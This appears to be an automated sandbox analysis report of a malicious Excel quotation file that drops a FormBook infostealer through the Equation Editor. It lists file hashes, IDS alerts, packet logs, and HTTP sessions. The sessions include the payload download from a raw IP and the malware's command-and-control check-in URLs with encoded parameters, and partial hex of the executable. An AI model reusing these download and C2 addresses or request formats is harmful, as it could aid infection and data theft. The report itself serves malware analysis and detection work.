                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                          C:\Users\user\Desktop\~$(QUOTATION)B-RUS-20061REV2.xlsx
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):330
                                          Entropy (8bit):1.4377382811115937
                                          Encrypted:false
                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                          Malicious:true
                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          C:\Users\Public\vbc.exe
                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):685568
                                          Entropy (8bit):7.6030295284828995
                                          Encrypted:false
                                          SSDEEP:12288:+11lXTqv/Q7zgVAhTQ4HzW0Ikfda+pv0va7bjndt:qDbsVdu5ID+90vMbjd
                                          MD5:50568FB6133EE4ED721EE46A3C0A9E98
                                          SHA1:4897B6F2141395071652F72D34DC3D39EB014A56
                                          SHA-256:2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
                                          SHA-512:D5FACFCF30E3E9F815F595C3AF6992551D623A5592C13E7AE8DF4E29E7F6401523339BF5A7835D46C80B998FDC3338530EA677F85A08C4FE16829A83879F529F
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 13%
                                          Joe Sandbox View:
                                          • Filename: MV HULDA MAERSK.xlsx, Detection: malicious, Browse
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Qa..............0..j.............. ........@.. ....................................@.....................................O.......`............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...`............l..............@..@.reloc...............t..............@..B.......................H........C...............6...Q.........................................."..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*.0..q........(........(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.....*j...(......

                                          Static File Info

                                          General

                                          File type:CDFV2 Encrypted
                                          Entropy (8bit):7.989352625928742
                                          TrID:
                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                          File name:(QUOTATION)B-RUS-20061REV2.xlsx
                                          File size:469848
                                          MD5:ecd068fb962c5a9452a6f22c0725521c
                                          SHA1:fdf1a902181584d47cb1aed7ac2ca333dcc62e5e
                                          SHA256:3c3d0f13af1ccf38e72804d40b87dc215813ff6b36a20137d48c4a565c5a5c2e
                                          SHA512:75e4df2f994c3d582b67a92cc101122a4cb2bf59a8b6d7db6d6733fa8d816a48884a9386a2b34ff2bf625a272a818719e945eaf32bdaa01057bef581f37364e9
                                          SSDEEP:12288:mHyL81K5G0hgFJQDyq+pNuI2WLp3/Ou3edGpJP:mSL15G0gkyq+pF9bpR
                                          File Content Preview:........................>...............................................................................{......................................................................................................................................................

                                          File Icon

                                          Icon Hash:e4e2aa8aa4b4bcb4

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          09/27/21-14:04:12.525746TCP2022566ET TROJAN Possible Malicious Macro EXE DL AlphaNumL4916580192.168.2.22180.214.239.85
                                          09/27/21-14:04:12.525746TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22180.214.239.85
                                          09/27/21-14:05:31.207248TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22128.65.195.232
                                          09/27/21-14:05:31.207248TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22128.65.195.232
                                          09/27/21-14:05:31.207248TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22128.65.195.232
                                          09/27/21-14:05:49.561791TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 14:04:12.153249025 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:12.524741888 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:12.525026083 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:12.525746107 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:12.877863884 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:12.877912045 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:12.877931118 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:12.877960920 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:12.878079891 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.248920918 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.248961926 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.248976946 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.248989105 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.249036074 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.249063969 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.249087095 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.249170065 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.249202013 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.249236107 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608402967 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608434916 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608526945 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608530045 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608567953 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608568907 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608588934 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608654022 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608685017 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608726978 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608755112 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608772993 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608789921 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608789921 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608807087 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608810902 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608822107 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608844995 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.609534025 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.609596968 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.609721899 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.609759092 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.609762907 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.609792948 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.609841108 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.609874010 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.611052036 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956279039 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956306934 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956321001 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956332922 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956346989 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956367016 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956384897 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956459045 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956475973 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956554890 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956649065 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956666946 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956676960 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956682920 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956705093 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956712961 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956722975 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956739902 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956743956 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956763029 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956763029 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956789970 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956815958 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956829071 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956846952 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956865072 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956882000 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956892967 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956918001 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957036018 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957119942 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957277060 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957330942 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957556963 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957616091 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957717896 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957752943 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957763910 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957789898 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957792044 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957832098 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957835913 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957876921 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957879066 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957916975 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.960515976 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338285923 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338298082 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338323116 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338340998 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338356972 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338376045 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338399887 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338401079 CEST4916580192.168.2.22180.214.239.85

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 14:05:31.143651962 CEST5216753192.168.2.228.8.8.8
                                          Sep 27, 2021 14:05:31.177267075 CEST53521678.8.8.8192.168.2.22
                                          Sep 27, 2021 14:05:49.398300886 CEST5059153192.168.2.228.8.8.8
                                          Sep 27, 2021 14:05:49.430988073 CEST53505918.8.8.8192.168.2.22

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 27, 2021 14:05:31.143651962 CEST192.168.2.228.8.8.80x8eb8Standard query (0)www.paradisgrp.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 14:05:49.398300886 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.uvoyus.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 27, 2021 14:05:31.177267075 CEST8.8.8.8192.168.2.220x8eb8No error (0)www.paradisgrp.com128.65.195.232A (IP address)IN (0x0001)
                                          Sep 27, 2021 14:05:49.430988073 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.uvoyus.comuvoyus.comCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 14:05:49.430988073 CEST8.8.8.8192.168.2.220xc18cNo error (0)uvoyus.com34.102.136.180A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • 180.214.239.85
                                          • www.paradisgrp.com
                                          • www.uvoyus.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.2249165180.214.239.8580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 14:04:12.525746107 CEST0OUTGET /service/rundll32.exe HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: 180.214.239.85
                                          Connection: Keep-Alive
                                          Sep 27, 2021 14:04:12.877863884 CEST1INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 12:04:10 GMT
                                          Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                          Last-Modified: Mon, 27 Sep 2021 09:26:10 GMT
                                          ETag: "a7600-5ccf6b00272b4"
                                          Accept-Ranges: bytes
                                          Content-Length: 685568
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/x-msdownload
                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 8d 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 0a 00 00 00 00 00 00 ee 88 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 88 0a 00 4f 00 00 00 00 a0 0a 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 69 0a 00 00 20 00 00 00 6a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 06 00 00 00 a0 0a 00 00 08 00 00 00 6c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 88 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc 43 02 00 f0 f2 00 00 03 00 00 00 01 01 00 06 cc 36 03 00 d0 51 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 7d 01 00 00 04 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0c 00 00 04 2a 1e 02 7b 0c 00 00 04 2a 22 02 03 7d 0d 00 00 04 2a 1e 02 7b 0d 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0f 00 00 04 2a 1e 02 7b 0f 00 00 04 2a 22 02 03 7d 10 00 00 04 2a 1e 02 7b 10 00 00 04 2a 13 30 02 00 71 00 00 00 00 00 00 00 02 28 17 00 00 0a 00 00 02 16 28 19 00 00 06 00 02 16 28 1b 00 00 06 00 02 16 28 1d 00 00 06 00 02 16 28 15 00 00 06 00 02 16 28 0f 00 00 06 00 02 16 28 17 00 00 06 00 02 16 28 09 00 00 06 00 02 16 28 09 00 00 06 00 02 16 28 01 00 00 06 00 02 16 28 03 00 00 06 00 02 16 28 0d 00 00 06 00 02 16 28 13 00 00 06 00 02 16 28 1f 00 00 06 00 2a 6a 00 02 03 28 19 00 00 06 00 02 04 28 1b 00 00 06 00 02
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQa0j @ @O` H.texti j `.rsrc`l@@.reloct@BHC6Q"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*0q((((((((((((((*j((


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.2249166128.65.195.23280C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 14:05:31.207247972 CEST724OUTGET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1
                                          Host: www.paradisgrp.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 14:05:31.225320101 CEST725INHTTP/1.1 404 Not Found
                                          Date: Mon, 27 Sep 2021 12:05:31 GMT
                                          Server: Apache
                                          Vary: accept-language,accept-charset
                                          Upgrade: h2
                                          Connection: Upgrade, close
                                          Accept-Ranges: bytes
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=utf-8
                                          Content-Language: en
                                          Data Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 31 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 39 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0d 0a 31 31 0d 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 31 0d 0a 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 35 0d 0a 77 77 77 2e 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 3c 73 70 61 6e 3e 0d 0a 32 39 0d 0a 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e
                                          Data Ascii: c8<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="13en"><head><title>38Object not found!</title><link rev="made" href="mailto:111webmaster@paradisgrp.com" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>1bObject not found!</h1><p>39 The requested URL was not found on this server. 57 If you entered the URL manually please check your spelling and try again. 29</p><p>48If you think this is a server error, please contactthe <a href="mailto:29webmaster@paradisgrp.com">webmaster</a>.11</p><h2>Error 21404</h2><address> <a href="/">25www.paradisgrp.com</a><br /> <span>29Apache</span></address></body>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 14:05:49.446181059 CEST726OUTGET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1
                                          Host: www.uvoyus.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 14:05:49.561790943 CEST727INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Mon, 27 Sep 2021 12:05:49 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6139ed55-113"
                                          Via: 1.1 google
                                          Connection: close
